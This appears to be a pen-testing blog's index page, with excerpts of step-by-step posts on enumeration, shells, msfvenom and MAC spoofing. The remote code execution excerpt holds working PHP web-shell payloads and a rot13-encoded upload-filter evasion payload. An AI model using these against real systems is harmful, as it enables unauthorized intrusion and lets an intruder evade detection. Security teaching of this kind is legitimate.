IT Systems, Networks, Security and Education
Getting a Remote Shell Let’s assume you’ve found some sort of access to your target, ideally an upload vulnerability that will let you get some shellcode onto the target. Netcat You could just start a Netcat listener on the victim, if Netcat is available: nc -lvnp 1234 … and start a shell on the attack …
Continue reading “[ Pen Testing ] :: Step by Step: Uploading Shellcode and Upgrading the Shell”
SSH Enumeration shellshock bruteforce user_enum Debian OpenSSL Predictable PRNG
SMB Enumeration nmap –script vuln nmap –script smb* nmap –script smb-enum-shares,smb-ls enum4linux, linenum, etc. smbclient smbcontrol smbmap smbpasswd etc
Database Enumeration Enumeration With SQLmap SQLmap is noisy as hell. Here is the official options/examples page: https://github.com/sqlmapproject/sqlmap/wiki/Usage. For example, save a captured header as an input file for SQLmap: Load HTTP request from a file Option: -r One of the possibilities of sqlmap is loading of raw HTTP request from a textual file. That way …
Continue reading “[ Pen Testing ] :: Step by Step: Database Enumeration”
SNMP Enumeration snmpcheck snmpenum (More to come.)
Hide Your Ass, Change Your MAC Manually ifconfig wlan0 down ifconfig wlan0 hw ether f1:a7:12:34:1b:c1 ifconfig wlan0 up With macchanger ifconfig wlan0 down # print your MAC macchanger -s wlan0 # set your MAC macchanger -m 11:22:33:44:55:66 wlan0 # set to a random vendor, random ID macchanger -A wlan0 # set to your physical vender, …
Continue reading “[ Pen Testing ] :: Step by Step: Changing Your MAC Address”
Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Local Linux Enumeration & Privilege Escalation Cheatsheet: an item-by-item list of tests performed by LinEnum: https://www.rebootuser.com/?p=1623 LinEnum: https://github.com/rebootuser/LinEnum
Msfvenom creates shellcode from within Bash. Here is Rapid7’s own excellent documentation: https://github.com/rapid7/metasploit-fraamework/wiki/How-to-use-msfvenom “Complete How to Guide for MSFvenom”: https://securitytraning.com/complete-guide-msfvenom/ And a good thorough walk-through (in Spanish, but with regular English command examples): https://www.hackplayers.com/2018/05/recopilacion-shells-en-windows.html Open Bash and enter: msfvenom to get a syntax page. View a list of payloads: msfvenom -l payloads Create the reverse …
Continue reading “[ Pen Testing ] :: Step by Step: msfvenom”
Remote Code Execution RCE PHP RCE Test a form for vulnerability to PHP RCE: <?php phpinfo(); ?> Get a remote PHP shell: <?php system($_GET[“c”]); ?> <?php `$_GET[“c”]`; ?> Upload a file: <?php file_put_contents(‘/var/www/html/uploads/test.php’, ‘<?php system($_GET[“c”]);?>’); ?> Evade file-type upload filters using rot13 + urlencode: <?php $payload=”%3C%3Fcuc%20flfgrz%28%24_TRG%5Bp%5D%29%3B%3F%3E”; file_put_contents(‘/var/www/html/uploads/testfile.php’, str_rot13(urldecode($payload))); ?> RCE via webshell Pentest Monkey has …
Continue reading “[ Pen Testing ] :: Step by Step: Remote Code Execution (RCE)”
Burp Suite Start with the basics: https://www.cybrary.it/s3ss10n/s3ss10n-wednesday-burp-suite-basics/ Use Burp to Test for Path Traversal Vulnerabilities https://support.portswigger.net/customer/en/portal/articles/2590663-using-burp-to-test-for-path-traversal-vulnerabilities